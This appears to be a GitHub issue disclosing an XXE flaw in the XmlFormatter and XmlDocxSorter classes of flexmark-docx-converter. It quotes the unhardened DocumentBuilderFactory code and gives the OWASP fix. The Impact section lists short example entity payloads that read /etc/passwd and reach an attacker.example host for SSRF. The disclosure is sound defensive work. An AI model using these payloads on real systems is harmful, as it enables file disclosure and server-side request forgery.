Skip to content

XXE vulnerability in XmlFormatter and XmlDocxSorter (CWE-611) #676

Description

@elarasu

Summary

XmlFormatter.format(String xml), XmlFormatter.formatDocumentBody(String xml), and XmlDocxSorter.sortDocumentParts(String xml) in flexmark-docx-converter create DocumentBuilderFactory instances without disabling external entity resolution or DOCTYPE declarations. This allows XML External Entity (XXE) attacks when the XML input originates from an untrusted source.

Vulnerable code

flexmark-docx-converter/src/main/java/com/vladsch/flexmark/docx/converter/util/XmlFormatter.java:24-44 (public API):

public static String format(String xml) {
    try {
        InputSource src = new InputSource(new StringReader(xml));
        Node document = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(src).getDocumentElement();
        ...
    }
}

No XXE hardening applied. The Javadoc explicitly documents this as a public utility (String formattedXml = XmlFormatter.format("<tag><nested>hello</nested></tag>")) and references the stackoverflow snippet it was copied from — which also lacks the hardening.

Same issue at XmlFormatter.formatDocumentBody:49:

DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
builderFactory.setNamespaceAware(false);
Document document = builderFactory.newDocumentBuilder().parse(src);

And XmlDocxSorter.sortDocumentParts:453:

DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
builderFactory.setNamespaceAware(false);
Document document = builderFactory.newDocumentBuilder().parse(src);

Impact

A consumer of flexmark-docx-converter who calls XmlFormatter.format(untrustedXml) (e.g. to pretty-print XML received from a user, an HTTP API, or a file upload) is vulnerable to:

  • File disclosure via <!ENTITY xxe SYSTEM \"file:///etc/passwd\">
  • SSRF via <!ENTITY xxe SYSTEM \"http://attacker.example/\">
  • DoS via billion-laughs entity expansion

JDK default for DocumentBuilderFactory resolves external entities; explicit hardening is required.

Recommended fix

Apply OWASP-recommended hardening to every DocumentBuilderFactory.newInstance() in this module:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
try {
    dbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);
    dbf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);
    dbf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);
    dbf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);
    dbf.setXIncludeAware(false);
    dbf.setExpandEntityReferences(false);
} catch (ParserConfigurationException e) {
    // log and fall through
}

Reference: OWASP XXE Prevention Cheat Sheet

CWE

How found

Discovered during a broad SAST sweep of the top-100 Java GitHub repos using cognium-ai + circle-ir (https://github.com/cogniumhq/circle-ir). Happy to share the analyzer trace if useful.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions